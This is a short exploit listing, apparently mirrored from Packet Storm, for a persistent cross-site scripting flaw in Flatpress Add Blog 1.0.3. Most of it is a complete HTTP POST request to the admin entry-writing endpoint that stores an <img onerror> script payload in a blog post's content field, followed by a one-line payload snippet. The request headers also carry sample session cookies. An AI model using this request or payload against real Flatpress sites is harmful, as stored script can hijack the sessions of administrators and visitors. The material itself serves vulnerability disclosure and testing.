Exploit for Flatpress Add Blog 1.0.3 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:159247
# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting  
# Google Dork: -  
# Date: 2020-09-19  
# Exploit Author: Alperen Ergel  
# Vendor Homepage: https://www.flatpress.org/  
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3  
# Version: 1.0.3   
# Tested on: windows 10 / xampp   
# CVE : -  
  
  
# Proof Of Content  
  
POST /flatpress/admin.php?p=entry&action=write HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 223  
Origin: http://localhost/  
Connection: close  
Referer: http://localhost/flatpress/admin.php?p=entry&action=write  
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1  
Upgrade-Insecure-Requests: 1  
  
_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&  
entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue  
  
  
# Snipp  
  
content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>